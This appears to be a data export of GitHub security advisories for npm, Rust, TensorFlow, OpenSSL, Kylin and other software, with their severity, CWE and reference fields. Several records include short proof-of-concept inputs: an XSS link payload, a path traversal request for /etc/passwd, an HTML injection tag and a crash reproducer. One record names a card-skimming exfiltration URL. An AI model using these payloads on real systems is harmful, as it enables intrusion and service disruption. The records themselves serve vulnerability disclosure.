GHSA | GHSA-v9wp-8r97-v6xg | Cross-Site Scripting in jquery.json-viewer | Versions of `jquery.json-viewer` prior to 1.3.0 are vulnerable to Cross-Site Scripting (XSS). The package insufficiently sanitizes user input when creating links, and concatenates the user input in an `<a>` tag. This allows attackers to create malicious links with JSON payloads such as:
```
{
"foo": "https://bar.com\" onmouseover=alert('xss') \""
}
```
This may lead to arbitrary JavaScript execution in a victim's browser.
## Recommendation
Upgrade to version 1.3.0 or later. | null | 2021-09-28T21:55:46Z | 2020-09-03T17:17:00Z | HIGH | 0 | {'CWE-79'} | {'https://www.npmjs.com/advisories/1036', 'https://github.com/advisories/GHSA-v9wp-8r97-v6xg'} | null |
GHSA | GHSA-xgp2-cc4r-7vf6 | Denial of Service in http-live-simulator | Versions of `http-live-simulator` prior to 1.0.8 are vulnerable to Denial of Service. The package fails to catch an exception that causes the Node process to crash, effectively shutting down the server. This allows an attacker to send an HTTP request that crashes the server.
## Recommendation
Upgrade to version 1.0.8 or later. | null | 2020-09-03T20:44:21Z | 2020-09-03T20:44:21Z | MODERATE | 0 | null | {'https://www.npmjs.com/advisories/1189', 'https://github.com/advisories/GHSA-xgp2-cc4r-7vf6', 'https://hackerone.com/reports/627376'} | null |
GHSA | GHSA-j8qc-5fqr-52fp | Division by zero in `Conv2DBackpropFilter` | ### Impact
An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 1, 1, 1],
use_cudnn_on_gpu=False,
padding='SAME',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L513-L522) computes a divisor based on user provided data (i.e., the shape of the tensors given as arguments):
```cc
const size_t size_A = output_image_size * filter_total_size;
const size_t size_B = output_image_size * dims.out_depth;
const size_t size_C = filter_total_size * dims.out_depth;
const size_t work_unit_size = size_A + size_B + size_C;
const size_t shard_size = (target_working_set_size + work_unit_size - 1) / work_unit_size;
```
If all shapes are empty then `work_unit_size` is 0. Since there is no check for this case before division, this results in a runtime exception, with potential to be abused for a denial of service.
### Patches
We have patched the issue in GitHub commit [c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team. | {'CVE-2021-29538'} | 2021-05-21T14:22:38Z | 2021-05-21T14:22:38Z | LOW | 2.5 | {'CWE-369'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j8qc-5fqr-52fp', 'https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29538', 'https://github.com/advisories/GHSA-j8qc-5fqr-52fp'} | null |
GHSA | GHSA-cxm3-284p-qc4v | Prototype Pollution in sds | Affected versions of `sds` are vulnerable to prototype pollution. The `set` function does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
## Recommendation
Upgrade to version 4.0.0 or later | {'CVE-2020-7618'} | 2021-07-29T15:56:43Z | 2020-09-03T15:53:12Z | MODERATE | 5.3 | {'CWE-915'} | {'https://snyk.io/vuln/SNYK-JS-SDS-564123', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7618', 'https://github.com/monsterkodi/sds/blob/master/js/set.js#L31', 'https://github.com/advisories/GHSA-cxm3-284p-qc4v', 'https://www.npmjs.com/advisories/1506'} | null |
GHSA | GHSA-qj3g-wfr7-3cv7 | Malicious Package in require-ports | Version 10.4.0 of `require-ports` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-09-30T21:56:12Z | 2020-09-02T21:41:53Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://github.com/advisories/GHSA-qj3g-wfr7-3cv7', 'https://www.npmjs.com/advisories/909'} | null |
GHSA | GHSA-wxgw-qj99-44c2 | Prototype Pollution in node-forge util.setPath API | ### Impact
`forge.util.setPath` had a potential prototype pollution issue if called with untrusted keys. This API was not used by forge itself.
### Patches
The `forge.util.setPath` API and related functions were removed in 0.10.0.
### Workarounds
Don't call `forge.util.setPath` directly or indirectly with untrusted keys.
### References
- https://security.snyk.io/vuln/SNYK-JS-NODEFORGE-598677
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7720
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [forge](https://github.com/digitalbazaar/forge).
* Email us at support@digitalbazaar.com. | null | 2022-01-08T00:22:40Z | 2022-01-08T00:22:40Z | LOW | 0 | null | {'https://github.com/digitalbazaar/forge/security/advisories/GHSA-wxgw-qj99-44c2', 'https://github.com/advisories/GHSA-wxgw-qj99-44c2'} | null |
GHSA | GHSA-jhgp-hvj6-x2p2 | Stored Cross-Site Scripting in tianma-static | All versions of `tianma-static` are vulnerable to stored cross-site scripting (XSS). The vulnerability is exploitable if a user can control the name of a file that is served by `tianma-static`
## Recommendation
As no fix is available for this vulnerability at this time it is our recommendation to use another static file server. | {'CVE-2018-16474'} | 2021-01-08T18:34:29Z | 2018-11-06T23:12:01Z | CRITICAL | 0 | {'CWE-79'} | {'https://www.npmjs.com/advisories/741', 'https://hackerone.com/reports/403692', 'https://github.com/advisories/GHSA-jhgp-hvj6-x2p2', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16474'} | null |
GHSA | GHSA-ch22-x2v3-v6vq | OTF-001: Improper Input Sanitation: The path parameter of the requested URL is not sanitized before being passed to the QT frontend | Between September 26, 2021 and October 8, 2021, [Radically Open Security](https://www.radicallyopensecurity.com/) conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's [Red Team lab](https://www.opentech.fund/labs/red-team-lab/). This is an issue from that penetration test.
- Vulnerability ID: OTF-001
- Vulnerability type: Improper Input Sanitization
- Threat level: Elevated
## Description:
The `path` parameter of the requested URL is not sanitized before being passed to the QT frontend.
## Technical description:
The `path` parameter is not sanitized before being passed to the constructor of the `QLabel`.
https://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/desktop/src/onionshare/tab/mode/__init__.py#L499-L509
https://github.com/onionshare/onionshare/blob/d08d5f0f32f755f504494d80794886f346fbafdb/desktop/src/onionshare/tab/mode/history.py#L456-L483
https://doc.qt.io/qt-5/qlabel.html#details
> Warning: When passing a QString to the constructor or calling setText(), make sure to sanitize your input, as QLabel tries to guess whether it displays the text as plain text or as rich text, a subset of HTML 4 markup. You may want to call setTextFormat() explicitly, e.g. in case you expect the text to be in plain format but cannot control the text source (for instance when displaying data loaded from the Web).
This path is used in all components for displaying the server access history. This leads to a rendered HTML4 Subset (QT RichText editor) in the Onionshare frontend.
In the following example an adversary injects a crafted image file into an Onionshare instance with receive mode and renders it in the history component of the Onionshare application.
The only requirement is another visit to the shared site with the following parameter attached to the path of the URL:
```
<img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAFElEQVQY02Nk+M+ABzAxMIxKYwIAQC0BEwZFOw4AAAAASUVORK5CYII=' />
```
This will be rendered as a green square in the history tab where the path value is supposed to be (the value itself is shown at the bottom of the page).

Possible scenarios where this could lead to remote code execution would be a 0-day in libpng or other internal image rendering (OTF-014 (page 12)) of the QT framework.
The QT documentation indicates that external files could be rendered, but we were unable to find a QT code path allowing for it.
## Impact:
An adversary with knowledge of the Onion service address in public mode or with authentication in private mode can render arbitrary HTML (QT-HTML4 Subset) in the server desktop application. This requires the desktop application with rendered history, therefore the impact is only elevated.
## Recommendation:
- Manually define the text format of the QLabel via `setTextFormat()` | {'CVE-2022-21690'} | 2022-01-21T23:20:25Z | 2022-01-21T23:20:25Z | HIGH | 8.7 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-21690', 'https://github.com/advisories/GHSA-ch22-x2v3-v6vq', 'https://github.com/onionshare/onionshare/releases/tag/v2.5', 'https://github.com/onionshare/onionshare/security/advisories/GHSA-ch22-x2v3-v6vq'} | null |
GHSA | GHSA-vj72-mwrj-m2xq | Prototype Pollution in deepmergefn | All versions of package deepmergefn are vulnerable to Prototype Pollution via deepMerge function.
| {'CVE-2021-23417'} | 2021-08-31T21:21:46Z | 2021-08-10T16:09:25Z | MODERATE | 5.6 | {'CWE-1321', 'CWE-915'} | {'https://github.com/jesusgm/deepmergefn/blob/master/index.js#23L6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23417', 'https://snyk.io/vuln/SNYK-JS-DEEPMERGEFN-1310984', 'https://github.com/advisories/GHSA-vj72-mwrj-m2xq'} | null |
GHSA | GHSA-8hfj-xrj2-pm22 | Certificate check bypass in openssl-src | The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). | {'CVE-2021-3450'} | 2022-04-22T16:50:55Z | 2021-08-25T20:54:00Z | HIGH | 7.4 | {'CWE-295'} | {'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b', 'https://www.tenable.com/security/tns-2021-08', 'http://www.openwall.com/lists/oss-security/2021/03/28/4', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3450', 'https://www.tenable.com/security/tns-2021-05', 'https://security.netapp.com/advisory/ntap-20210326-0006/', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'http://www.openwall.com/lists/oss-security/2021/03/27/2', 'https://github.com/advisories/GHSA-8hfj-xrj2-pm22', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013', 'https://www.openssl.org/news/secadv/20210325.txt', 'https://security.gentoo.org/glsa/202103-03', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/', 'http://www.openwall.com/lists/oss-security/2021/03/27/1', 'https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html', 'https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10356', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd', 'https://www.tenable.com/security/tns-2021-09', 'http://www.openwall.com/lists/oss-security/2021/03/28/3', 'https://rustsec.org/advisories/RUSTSEC-2021-0056.html', 'https://www.oracle.com//security-alerts/cpujul2021.html'} | null |
GHSA | GHSA-9p49-cwh3-4qhf | Malicious Package in grunt-radic | Version 0.1.1 of `grunt-radic` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment and evaluate your application to determine whether or not user data was compromised. | null | 2020-09-11T21:21:19Z | 2020-09-11T21:21:19Z | CRITICAL | 0 | null | {'https://github.com/advisories/GHSA-9p49-cwh3-4qhf', 'https://www.npmjs.com/advisories/934'} | null |
GHSA | GHSA-vxvp-4xwc-jpp6 | Moderate severity vulnerability that affects activesupport | Cross-site scripting (XSS) vulnerability in json/encoding.rb in Active Support in Ruby on Rails 3.x and 4.1.x before 4.1.11 and 4.2.x before 4.2.2 allows remote attackers to inject arbitrary web script or HTML via a crafted Hash that is mishandled during JSON encoding. | {'CVE-2015-3226'} | 2021-06-11T14:45:06Z | 2017-10-24T18:33:36Z | MODERATE | 0 | {'CWE-79'} | {'http://www.securityfocus.com/bid/75231', 'https://github.com/advisories/GHSA-vxvp-4xwc-jpp6', 'http://www.debian.org/security/2016/dsa-3464', 'http://openwall.com/lists/oss-security/2015/06/16/17', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/7VlB_pck3hU/3QZrGIaQW6cJ', 'http://www.securitytracker.com/id/1033755', 'https://nvd.nist.gov/vuln/detail/CVE-2015-3226'} | null |
GHSA | GHSA-jq65-29v4-4x35 | Null pointer deference in openssl-src | Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f). | {'CVE-2020-1967'} | 2021-10-21T21:10:47Z | 2021-08-25T20:45:15Z | HIGH | 7.5 | {'CWE-476'} | {'https://github.com/irsl/CVE-2020-1967', 'https://security.netapp.com/advisory/ntap-20200717-0004/', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://rustsec.org/advisories/RUSTSEC-2020-0015.html', 'https://www.synology.com/security/advisory/Synology_SA_20_05_OpenSSL', 'https://lists.apache.org/thread.html/r9a41e304992ce6aec6585a87842b4f2e692604f5c892c37e3b0587ee@%3Cdev.tomcat.apache.org%3E', 'https://security.FreeBSD.org/advisories/FreeBSD-SA-20:11.openssl.asc', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1967', 'https://lists.apache.org/thread.html/r94d6ac3f010a38fccf4f432b12180a13fa1cf303559bd805648c9064@%3Cdev.tomcat.apache.org%3E', 'https://www.openssl.org/news/secadv/20200421.txt', 'https://www.tenable.com/security/tns-2020-04', 'https://www.debian.org/security/2020/dsa-4661', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'http://packetstormsecurity.com/files/157527/OpenSSL-signature_algorithms_cert-Denial-Of-Service.html', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r66ea9c436da150683432db5fbc8beb8ae01886c6459ac30c2cea7345@%3Cdev.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00004.html', 'https://www.tenable.com/security/tns-2021-10', 'http://www.openwall.com/lists/oss-security/2020/04/22/2', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00011.html', 'https://github.com/advisories/GHSA-jq65-29v4-4x35', 'https://www.synology.com/security/advisory/Synology_SA_20_05', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/', 'https://security.gentoo.org/glsa/202004-10', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/', 'https://www.tenable.com/security/tns-2020-11', 'http://seclists.org/fulldisclosure/2020/May/5', 'https://www.tenable.com/security/tns-2020-03', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/', 'https://security.netapp.com/advisory/ntap-20200424-0003/', 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=eb563247aef3e83dda7679c43f9649270462e5b1', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44440', 'https://www.oracle.com//security-alerts/cpujul2021.html'} | null |
GHSA | GHSA-cx3w-xqmc-84g5 | Git LFS can execute a Git binary from the current directory on Windows | ### Impact
On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.
This is the result of an incomplete fix for CVE-2020-27955.
This issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).
### Patches
This version should be patched in v2.13.2, which will be released in coordination with this security advisory.
### Workarounds
Other than avoiding untrusted repositories or using a different operating system, there is no workaround.
### References
_Are there any links users can visit to find out more?_
### For more information
If you have any questions or comments about this advisory:
- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).
- If you cannot open a discussion, please email the core team using their usernames at `github.com`. | {'CVE-2021-21237'} | 2022-04-20T16:24:42Z | 2022-02-15T00:30:37Z | HIGH | 7.2 | {'CWE-94', 'CWE-426'} | {'https://github.com/git-lfs/git-lfs/security/advisories/GHSA-cx3w-xqmc-84g5', 'https://github.com/git-lfs/git-lfs/commit/fc664697ed2c2081ee9633010de0a7f9debea72a', 'https://github.com/advisories/GHSA-cx3w-xqmc-84g5', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27955', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21237', 'https://github.com/git-lfs/git-lfs/releases/tag/v2.13.2'} | null |
GHSA | GHSA-h92m-42h4-82f6 | High severity vulnerability that affects postfix-mta-sts-resolver | ## Incorrect query parsing
### Impact
All users of versions prior to 0.5.1 can receive incorrect response from daemon under rare conditions, rendering downgrade of effective STS policy.
### Patches
Problem has been patched in version 0.5.1
### Workarounds
Users may remediate this vulnerability without upgrading by applying [these patches](https://gist.github.com/Snawoot/b9da85d6b26dea5460673b29df1adc6b) to older suppoorted versions.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [postfix-mta-sts-resolver repo](https://github.com/Snawoot/postfix-mta-sts-resolver)
* Email me at [vladislav at vm-0 dot com](mailto:vladislav-ex-gh-advisory@vm-0.com) | {'CVE-2019-16791'} | 2021-01-08T21:22:28Z | 2019-07-05T21:06:58Z | HIGH | 6.9 | {'CWE-757'} | {'https://github.com/advisories/GHSA-h92m-42h4-82f6', 'https://gist.github.com/Snawoot/b9da85d6b26dea5460673b29df1adc6b', 'https://github.com/Snawoot/postfix-mta-sts-resolver/security/advisories/GHSA-h92m-42h4-82f6', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16791'} | null |
GHSA | GHSA-jp6r-xcjj-5h7r | Cross-Site Scripting in cyberchef | Versions of `cyberchef` prior to 8.31.3 are vulnerable to Cross-Site Scripting. In `Text Encoding Brute Force` the table rows are created by concatenating the `value` variable unsanitized in the HTML code. If this variable is controlled by user input it allows attackers to execute arbitrary JavaScript in a victim's browser.
## Recommendation
Upgrade to version 8.31.3 or later. | {'CVE-2019-15532'} | 2021-08-17T22:11:12Z | 2019-08-27T17:36:32Z | MODERATE | 6.1 | {'CWE-79'} | {'https://snyk.io/vuln/SNYK-JS-CYBERCHEF-460296', 'https://github.com/gchq/CyberChef/compare/v8.31.1...v8.31.2', 'https://github.com/gchq/CyberChef/commit/01f0625d6a177f9c5df9281f12a27c814c2d8bcf', 'https://www.npmjs.com/advisories/1149', 'https://github.com/gchq/CyberChef/issues/544', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15532', 'https://github.com/advisories/GHSA-jp6r-xcjj-5h7r', 'https://github.com/gchq/CyberChef/issues/539'} | null |
GHSA | GHSA-gprm-xqrc-c2j3 | Command Injection in Kylin | Kylin has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. | {'CVE-2020-1956'} | 2021-09-22T21:56:35Z | 2020-07-27T22:51:44Z | HIGH | 8.8 | {'CWE-78'} | {'https://lists.apache.org/thread.html/r61666760d8a4e8764b2d5fe158d8a48b569414480fbfadede574cdc0@%3Ccommits.kylin.apache.org%3E', 'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E', 'https://github.com/apache/kylin/commit/58fad56ac6aaa43c6bd8f962d7f2d84438664092', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1956', 'https://github.com/advisories/GHSA-gprm-xqrc-c2j3', 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-570207', 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cdev.kylin.apache.org%3E', 'https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706', 'http://www.openwall.com/lists/oss-security/2020/07/14/1', 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cuser.kylin.apache.org%3E', 'https://lists.apache.org/thread.html/r1332ef34cf8e2c0589cf44ad269fb1fb4c06addec6297f0320f5111d%40%3Cuser.kylin.apache.org%3E', 'https://lists.apache.org/thread.html/r250a867961cfd6e0506240a9c7eaee782d84c6ab0091c7c4bc45f3eb@%3Cannounce.apache.org%3E'} | null |
GHSA | GHSA-mp6r-fgw2-rxfx | Multiple soundness issues | An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because bytes from an X server can be interpreted as any data type returned by xcb::xproto::GetPropertyReply::value. | {'CVE-2021-26956'} | 2021-08-25T20:53:27Z | 2021-08-25T20:53:27Z | CRITICAL | 9.8 | {'CWE-657'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-26956', 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html', 'https://github.com/advisories/GHSA-mp6r-fgw2-rxfx', 'https://github.com/RustSec/advisory-db/issues/653'} | null |
GHSA | GHSA-wmcq-3wfx-qjx5 | Directory Traversal in nodeload-nmickuli | Affected versions of `nodeload-nmickuli` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | null | 2021-09-23T21:46:51Z | 2020-09-01T17:33:30Z | HIGH | 0 | {'CWE-22'} | {'https://github.com/advisories/GHSA-wmcq-3wfx-qjx5', 'https://www.npmjs.com/advisories/410', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/nodeload-nmickuli'} | null |
GHSA | GHSA-4g52-pqcj-phvh | BLS Signature "Malleability" | ### Impact
1. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms - "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays.
2. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. The CID method for blockheader includes the BlockSig of the block.
The result of these issues is that it would be possible to punish miners for valid blocks, as there are two different valid block CIDs available for each block, even though this must be unique.
### Patches
By switching from the go based `blst` bindings over to the bindings in `filecoin-ffi`, the code paths now ensure that all signatures are compressed by size and the way they are deserialized.
This happened in https://github.com/filecoin-project/lotus/pull/5393
### References
- Original POC: https://gist.github.com/wadeAlexC/2490d522e81a796af9efcad1686e6754 | {'CVE-2021-21405'} | 2021-05-21T16:23:43Z | 2021-05-21T16:23:43Z | MODERATE | 5.9 | {'CWE-347'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-21405', 'https://gist.github.com/wadeAlexC/2490d522e81a796af9efcad1686e6754', 'https://github.com/filecoin-project/lotus/security/advisories/GHSA-4g52-pqcj-phvh', 'https://github.com/filecoin-project/lotus/pull/5393', 'https://github.com/advisories/GHSA-4g52-pqcj-phvh'} | null |
GHSA | GHSA-g8r4-p96j-xfxc | Twig allowing dangerous PHP functions by default in getgrav/grav | ### Impact
Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.
As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
### Patches
The issue was addressed by preventing dangerous functions from being called in Twig templates. A configuration option has been added to manually allow arbitrary PHP functions (`system.twig.safe_functions`) and filters (`system.twig.safe_filters`).
Futures major versions of Grav may disable this functionality by default.
### Workarounds
Blocking access to the `/admin` path from untrusted sources will reduce the probability of exploitation.
### References
- https://portswigger.net/research/server-side-template-injection
- https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities
### For more information
If you have any questions or comments about this advisory, you can contact:
- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com;
- The maintainers, by opening an issue on this repository. | {'CVE-2021-29440'} | 2022-04-19T19:02:53Z | 2021-04-16T19:53:12Z | HIGH | 8.4 | {'CWE-94'} | {'https://github.com/getgrav/grav/security/advisories/GHSA-g8r4-p96j-xfxc', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29440', 'https://packagist.org/packages/getgrav/grav', 'http://packetstormsecurity.com/files/162987/Grav-CMS-1.7.10-Server-Side-Template-Injection.html', 'https://github.com/advisories/GHSA-g8r4-p96j-xfxc'} | null |
GHSA | GHSA-hx5g-8hq2-8x4w | SQL Injection in Kylin | Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is from system configurations, while the configuration can be overwritten by certain rest api, which makes SQL injection attack is possible. Users of all previous versions after 2.0 should upgrade to 3.1.0. | {'CVE-2020-13926'} | 2021-09-22T21:51:24Z | 2020-07-27T22:51:40Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13926', 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-584374', 'https://github.com/advisories/GHSA-hx5g-8hq2-8x4w', 'https://lists.apache.org/thread.html/r63d5663169e866d44ff9250796193337cff7d9cf61cc3839e86163fd%40%3Cuser.kylin.apache.org%3E'} | null |
GHSA | GHSA-369h-pjr2-6wrh | Uncontrolled recursion in trust-dns-proto | An issue was discovered in the trust-dns-proto crate before 0.5.0-alpha.3 for Rust. There is infinite recursion because DNS message compression is mishandled. | {'CVE-2018-20994'} | 2021-08-25T20:43:16Z | 2021-08-25T20:43:16Z | HIGH | 7.5 | {'CWE-674'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-20994', 'https://github.com/advisories/GHSA-369h-pjr2-6wrh', 'https://rustsec.org/advisories/RUSTSEC-2018-0007.html'} | null |
GHSA | GHSA-gf2v-9hp6-44qg | Moderate severity vulnerability that affects org.apache.hive:hive, org.apache.hive:hive-exec, and org.apache.hive:hive-service | Apache Hive (JDBC + HiveServer2) implements SSL for plain TCP and HTTP connections (it supports both transport modes). While validating the server's certificate during the connection setup, the client in Apache Hive before 1.2.2 and 2.0.x before 2.0.1 doesn't seem to be verifying the common name attribute of the certificate. In this way, if a JDBC client sends an SSL request to server abc.com, and the server responds with a valid certificate (certified by CA) but issued to xyz.com, the client will accept that as a valid certificate and the SSL handshake will go through. | {'CVE-2016-3083'} | 2021-09-10T20:48:34Z | 2019-03-14T15:40:32Z | HIGH | 7.5 | {'CWE-295'} | {'http://www.securityfocus.com/bid/98669', 'https://github.com/advisories/GHSA-gf2v-9hp6-44qg', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3083', 'https://lists.apache.org/thread.html/0851bcf85635385f94cdaa008053802d92b4aab0a3075e30ed171192@%3Cdev.hive.apache.org%3E'} | null |
GHSA | GHSA-cx8m-8xmx-q8v3 | Denial of Service in memjs | Versions of `memjs` prior to 1.2.2 are vulnerable to Denial of Service (DoS). The package fails to sanitize the `value` option passed to the Buffer constructor, which may allow attackers to pass large values exhausting system resources.
## Recommendation
Upgrade to version 1.2.2 or later. | {'CVE-2018-3767'} | 2021-01-08T18:55:31Z | 2018-10-10T17:25:12Z | MODERATE | 0 | {'CWE-400'} | {'https://hackerone.com/reports/319809', 'https://www.npmjs.com/advisories/970', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3767', 'https://github.com/advisories/GHSA-cx8m-8xmx-q8v3'} | null |
